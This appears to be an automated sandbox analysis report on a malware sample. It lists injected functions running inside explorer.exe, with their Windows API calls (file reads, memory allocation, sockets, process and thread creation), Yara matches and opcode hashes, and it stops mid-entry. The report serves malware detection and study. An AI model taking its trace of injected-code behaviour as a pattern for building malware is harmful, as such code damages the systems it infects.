Function 06D4FDF2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 06D4FE51

Strings

sock, xrefs: 06D4FE19

Memory Dump Source

Source File: 00000003.00000002.511411283.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
Instruction ID: 93e9cd11b65e4fa9d89cecb88364315c2d6d983bf4fc70c658315370792b9ae1
Opcode Fuzzy Hash: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
Instruction Fuzzy Hash: 6E01447061860C8FCB84EF5CD048B55BBE0FB59314F1545ADD85DDB276D7B0C9818B86

Uniqueness

Uniqueness Score: -1.00%

Function 06D482C9, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 06D4831D

Memory Dump Source

Source File: 00000003.00000002.511411283.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8b3b5490eaa0f5a1cab87b82b9e561739e4acbeb8a6e6c65e69d485847707252
Instruction ID: 3afb860b12f7f52b85b02b7853d4a7fe51fc75ff6fe0aad34f1566089a83cc9c
Opcode Fuzzy Hash: 8b3b5490eaa0f5a1cab87b82b9e561739e4acbeb8a6e6c65e69d485847707252
Instruction Fuzzy Hash: DF314A74A04B09DFDBA4FF6984883A5B3A1FB54341F14427E896DCA206CB74D990DFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: explorer.exe PID: 3980 Parent PID: 3472 explorer.exeCOMMON

Executed Functions

Function 008A9F2B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,008A4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,008A4B87,007A002E,00000000,00000060,00000000,00000000), ref: 008A9F7D

Strings

.z`, xrefs: 008A9F6D, 008A9F78

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: fa0e5af847838058c09d630bdacdc603204d030bac8b9088fac9c2427ee960d9
Instruction ID: 3e76a2a7c2a4713cca3ba293c45dd3507bf641f28d8226f7b1b7e03703b31471
Opcode Fuzzy Hash: fa0e5af847838058c09d630bdacdc603204d030bac8b9088fac9c2427ee960d9
Instruction Fuzzy Hash: BF01B2B2200108AFDB58CF98DC95EEB77A9FF8C354F158248FA1D97281C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 008A9F30, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,008A4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,008A4B87,007A002E,00000000,00000060,00000000,00000000), ref: 008A9F7D

Strings

.z`, xrefs: 008A9F6D, 008A9F78

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 79debc1b1e5d85357d91f9db24f81208f78c330e64294cc2888a5a6ee4b8301f
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: B8F0BDB2210208ABCB48CF88DC95EEB77ADAF8C754F158248BA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 008A9F82, Relevance: 1.6, APIs: 1, Instructions: 77filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(008A4D42,5EB6522D,FFFFFFFF,008A4A01,?,?,008A4D42,?,008A4A01,FFFFFFFF,5EB6522D,008A4D42,?,00000000), ref: 008AA025

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d1a8e53185c2b4e0edf317d61d8f5f7986b425ee7fbe0f77c521345d95af5a9c
Instruction ID: 36c6fa849e775b1d28655a836c5c19c81042ea15c35967004290eafd0cd8896f
Opcode Fuzzy Hash: d1a8e53185c2b4e0edf317d61d8f5f7986b425ee7fbe0f77c521345d95af5a9c
Instruction Fuzzy Hash: 1121ECB6200104ABDB14DF99DC90EEB77A9EF8C724F158348FA1DE7681D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 008A9FDA, Relevance: 1.6, APIs: 1, Instructions: 55filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(008A4D42,5EB6522D,FFFFFFFF,008A4A01,?,?,008A4D42,?,008A4A01,FFFFFFFF,5EB6522D,008A4D42,?,00000000), ref: 008AA025

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 5f64841fdf20f9fced9aea9180da2a4fc0cd3b9c31e291df114ec28220d9f148
Instruction ID: bb273b6c95b5090bb3e7c74dec7e113c28267e3f1d96dc05c65d20a93ac8ff7b
Opcode Fuzzy Hash: 5f64841fdf20f9fced9aea9180da2a4fc0cd3b9c31e291df114ec28220d9f148
Instruction Fuzzy Hash: 09015B76200104ABDB18DF88CC80EEB77A9FF8C360F118249BA1C97641C630E801CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 008A9FE0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(008A4D42,5EB6522D,FFFFFFFF,008A4A01,?,?,008A4D42,?,008A4A01,FFFFFFFF,5EB6522D,008A4D42,?,00000000), ref: 008AA025

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 3ec1c6ab820fb26a41588c46f31e124926309897e42309f31e203d65b23889d0
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 4CF0A4B6210208ABDB18DF89DC91EEB77ADEF8C754F158248BA1D97241D630E811CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008AA110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00892D11,00002000,00003000,00000004), ref: 008AA149

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 573f338e2730d19e34ebca235aeb6fafb56a848c64f6f968795a12e695187eb4
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 2DF015B6210208ABDB18DF89CC81EAB77ADEF88750F118248BE0897241C630F811CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 008AA060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(008A4D20,?,?,008A4D20,00000000,FFFFFFFF), ref: 008AA085

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 09680de5635b2403132fc1f385f8e74b74ff8055ac24a2cf637178c95634a789
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 62D01776200214ABE714EB98CC85FA77BADEF48760F154599BA189B642C630FA0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE984A

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f552c355690a4df4ac9b4644101fa7664c253c7cc12e969b858249239f7b6812
Instruction ID: 4327834a24c26731b8de21475397204ab5c4e1f14da86a6331dfe63b1106ad3e
Opcode Fuzzy Hash: f552c355690a4df4ac9b4644101fa7664c253c7cc12e969b858249239f7b6812
Instruction Fuzzy Hash: C69002A1242042527585B15948045474107A7E02857A2C012A2425950C956AE856F661

Uniqueness

Uniqueness Score: -1.00%

Function 04CE9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE986A

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4243ea6dde63430224e494615fff758d3a3cd500fd2acdc743cf68a436ff3efc
Instruction ID: 43abedd882324a9bac3159cf0ca1f483cbe3e1542f2e835fb13f790fbe42e551
Opcode Fuzzy Hash: 4243ea6dde63430224e494615fff758d3a3cd500fd2acdc743cf68a436ff3efc
Instruction Fuzzy Hash: 169002B120100513F15161594904747010A97D0285FA2C412A1435558DA69AD952B161

Uniqueness

Uniqueness Score: -1.00%

Function 04CE95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE95DA

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fac8271150c5dde454bca83599766c2f7cac79f53cd2033d23f91ed9f89d5f9b
Instruction ID: 1e657a2abe384a515342cff0d4ae71bbbc790e4488357af2ac7e9dd5e6847649
Opcode Fuzzy Hash: fac8271150c5dde454bca83599766c2f7cac79f53cd2033d23f91ed9f89d5f9b
Instruction Fuzzy Hash: 9D9002E120200103614571594814656410B97E0245B62C021E2025590DD569D8917165

Uniqueness

Uniqueness Score: -1.00%

Function 04CE99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE99AA

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 57d3f7056b0336acd1dcfc171edf44ce80a86682d311f8c3a6f43cc9d97e9e89
Instruction ID: d69029b0dd514d1c18b60f1a0f9c26d4ce21eff123285b532ee124734d3a0dc6
Opcode Fuzzy Hash: 57d3f7056b0336acd1dcfc171edf44ce80a86682d311f8c3a6f43cc9d97e9e89
Instruction Fuzzy Hash: 249002E134100542F14061594814B460106D7E1345F62C015E2075554D965DDC527166

Uniqueness

Uniqueness Score: -1.00%

Function 04CE9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE954A

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ca2dbff1b8b5f94840ee481408a0b08cc2e9b0d621b663bd5f816e3196a533ed
Instruction ID: 3e2a15ef538235e98227303a29f402a58ea52eb2d6ba17b748a6b47f39d7b60e
Opcode Fuzzy Hash: ca2dbff1b8b5f94840ee481408a0b08cc2e9b0d621b663bd5f816e3196a533ed
Instruction Fuzzy Hash: 8C9002A5211001032145A5590B04547014797D5395362C021F2026550CE665D8617161

Uniqueness

Uniqueness Score: -1.00%

Function 04CE9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE991A

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 831a63afcd360f46616651759a86c69f9af82d8121d3ce07b73f0d33121d950a
Instruction ID: 86274c1ed853f43fba963d1d02f8510711148b472d6385d8db26b0fba398d895
Opcode Fuzzy Hash: 831a63afcd360f46616651759a86c69f9af82d8121d3ce07b73f0d33121d950a
Instruction Fuzzy Hash: DB9002F120100502F18071594804786010697D0345F62C011A6075554E969DDDD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04CE96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE96DA

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 30b5b344b2509b608891b7bfef1104f583b81de636b1c130d87ad226c3b8a3f1
Instruction ID: f1b787158599e62a1d46a3081be1e0aa44dbdeb9b69cb854f3d5d3905de81bab
Opcode Fuzzy Hash: 30b5b344b2509b608891b7bfef1104f583b81de636b1c130d87ad226c3b8a3f1
Instruction Fuzzy Hash: AD9002B120100942F14061594804B86010697E0345F62C016A1135654D9659D8517561

Uniqueness

Uniqueness Score: -1.00%

Function 04CE96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE96EA

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c364df81306bbecf0db3f4bcd1ccdc4eb84081488aee4176e5ed71a057c766e
Instruction ID: 315e872a1ebc573300b0e8e3fbf47b16479c13b76286fce19664098b248ffdc9
Opcode Fuzzy Hash: 2c364df81306bbecf0db3f4bcd1ccdc4eb84081488aee4176e5ed71a057c766e
Instruction Fuzzy Hash: 0C9002B120108902F1506159880478A010697D0345F66C411A5435658D96D9D8917161

Uniqueness

Uniqueness Score: -1.00%

Function 04CE9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE9A5A

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6618ce935af4a4261334fb2dd4e85aa8f95eaa7f394049e186c67e1c24c49f3d
Instruction ID: 4408439dfeb086993856c19f614c6cec3556bb1dea350840dce627389ac5b9a6
Opcode Fuzzy Hash: 6618ce935af4a4261334fb2dd4e85aa8f95eaa7f394049e186c67e1c24c49f3d
Instruction Fuzzy Hash: C99002A121180142F24065694C14B47010697D0347F62C115A1165554CD959D8617561

Uniqueness

Uniqueness Score: -1.00%

Function 04CE9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE965A

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36eb41618b7d1ba52285d452f9fc7d44bf86e5818631b2b11257bc5b34b9f8e4
Instruction ID: d49a508c850a118097ed79a9f6b028b5d2d69a8bc978d9b939105178555982b0
Opcode Fuzzy Hash: 36eb41618b7d1ba52285d452f9fc7d44bf86e5818631b2b11257bc5b34b9f8e4
Instruction Fuzzy Hash: 749002B120504942F18071594804A86011697D0349F62C011A1075694DA669DD55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE966A

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 12fda6651f75bf872f89f84b6742e895adc39e70e484a38ce8b0d0a714ef0006
Instruction ID: 19719eca3ef10c00d32561f95c02fa2ae23028e7c1f914137e50bb3f5e19aea7
Opcode Fuzzy Hash: 12fda6651f75bf872f89f84b6742e895adc39e70e484a38ce8b0d0a714ef0006
Instruction Fuzzy Hash: A79002B120100902F1C07159480468A010697D1345FA2C015A1036654DDA59DA5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE9FEA

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 915d59385efed385033df089de9fe2f27e7794a18e0386f5816d0bddd8d75094
Instruction ID: bdd3d2a887ceb510f53b8935657d592af86b2c5720775ea73e011cc1a826677a
Opcode Fuzzy Hash: 915d59385efed385033df089de9fe2f27e7794a18e0386f5816d0bddd8d75094
Instruction Fuzzy Hash: F19002B131114502F15061598804746010697D1245F62C411A1835558D96D9D8917162

Uniqueness

Uniqueness Score: -1.00%

Function 04CE9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE978A

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 299af613086ee3f759b4451be2dae330689ddbb14d2daa294727c8079bbc7212
Instruction ID: 47d16095145d8ffe0690869b8c2d3939b0c39e435014c4a15fb1b087d3732350
Opcode Fuzzy Hash: 299af613086ee3f759b4451be2dae330689ddbb14d2daa294727c8079bbc7212
Instruction Fuzzy Hash: B09002A921300102F1C07159580864A010697D1246FA2D415A1026558CD959D8697361

Uniqueness

Uniqueness Score: -1.00%

Function 04CE9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE971A

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f65f49152f1812d513ed6ddfc307982917857aff7b62cc6b2a3c34c2a82e1fa
Instruction ID: 931aafc21538b56e153ae10d3c3c6e3daafe3e2d904cb7066fee68ccf1d64ca2
Opcode Fuzzy Hash: 0f65f49152f1812d513ed6ddfc307982917857aff7b62cc6b2a3c34c2a82e1fa
Instruction Fuzzy Hash: 2B9002B120100502F14065995808686010697E0345F62D011A6035555ED6A9D8917171

Uniqueness

Uniqueness Score: -1.00%

Function 008A8C50, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 008A8CF8

Strings

net.dll, xrefs: 008A8CC1, 008A8D47, 008A8D1F, 008A8D2B, 008A8D53
wininet.dll, xrefs: 008A8CAE, 008A8CB7

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 405b0c3b23b0dba43dd4dca5e73deddf37d0e9984a6b5a180935d83b14f5c289
Instruction ID: 3eef5bf3ae340d0e6043e028aff29f705aefc8a6ad138a9472e1b3834387e122
Opcode Fuzzy Hash: 405b0c3b23b0dba43dd4dca5e73deddf37d0e9984a6b5a180935d83b14f5c289
Instruction Fuzzy Hash: 313192B2500344BBD724DF68D885FA7B7B8FB48700F04851DF6299B641DB70BA50CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 008A8C47, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 008A8CF8

Strings

net.dll, xrefs: 008A8CC1, 008A8D1F, 008A8D2B
wininet.dll, xrefs: 008A8CAE, 008A8CB7

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: ee5aeb8aa484636d91701283b2bab3a9822b6d2e9012807f42511356df915ca3
Instruction ID: c08d274e6d4990e57f793c1c178f03edf3d65e851c9b59ac341aba9f66b8091f
Opcode Fuzzy Hash: ee5aeb8aa484636d91701283b2bab3a9822b6d2e9012807f42511356df915ca3
Instruction Fuzzy Hash: 8321A571940344BBD724DF68C8C5B67B7B4FB45700F14802DF6199B682DB74A950CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 008AA240, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00893AF8), ref: 008AA26D

Strings

.z`, xrefs: 008AA25C, 008AA268

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: b474e83d5beae7e408d89dd6c3f9a2044c88a40e5ca79b4ed60b4e1cdac20f73
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: E3E04FB52102046BD718DF59CC45EA777ADEF88750F014554FD0857641C630F911CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 008982E8, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0089834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0089836B

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f07e97c6a9910221f75f4a0f8f63bea915d07932d1a1b51c8cf53847ab1e0383
Instruction ID: 48eec743539ac748093042f8dabc931ba7856e8c84fbd580bfd281019c9c2e35
Opcode Fuzzy Hash: f07e97c6a9910221f75f4a0f8f63bea915d07932d1a1b51c8cf53847ab1e0383
Instruction Fuzzy Hash: 6A01B531A402297BEB20AA989C43FFE776CFB41B50F144118FB04FA1C1E6A4690542E6

Uniqueness

Uniqueness Score: -1.00%

Function 008982F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0089834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0089836B

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: dcd148f8eb9613c1c31dfcc17dcc9982b3fbba6105a6c7f3ee15f26649511bc5
Instruction ID: 7853c9f3291628194b1783d09227270bf29343dd31a59bdcc7d1b4870f288ad7
Opcode Fuzzy Hash: dcd148f8eb9613c1c31dfcc17dcc9982b3fbba6105a6c7f3ee15f26649511bc5
Instruction Fuzzy Hash: EB018431A802287BEB25B6989C03FBE766CBB41F51F044114FB04FA1C1EAD4690546E6

Uniqueness

Uniqueness Score: -1.00%

Function 008A8D74, Relevance: 1.6, APIs: 1, Instructions: 117threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0089F020,?,?,00000000), ref: 008A8DBC

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0c8c12290bd952c0b6b4de22205d96228401645a012ba46b5416257b4fc9c133
Instruction ID: 83c2fce320b84a98baa1ccc464eca9558f89fd70f9a330067842b85bb5a59452
Opcode Fuzzy Hash: 0c8c12290bd952c0b6b4de22205d96228401645a012ba46b5416257b4fc9c133
Instruction Fuzzy Hash: D1419EB2600705BBE724DE78C885FE7B7A8FF45310F044519F629E7681DB71B9208BA1

Uniqueness

Uniqueness Score: -1.00%

Function 008AA2B0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008AA304

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 6fc50c3bcc9e06fcf153a5be05b20bad4448d779704f0f71c8ba222cf2af8469
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 8C01AFB2210108ABCB58DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 008AA2AE, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

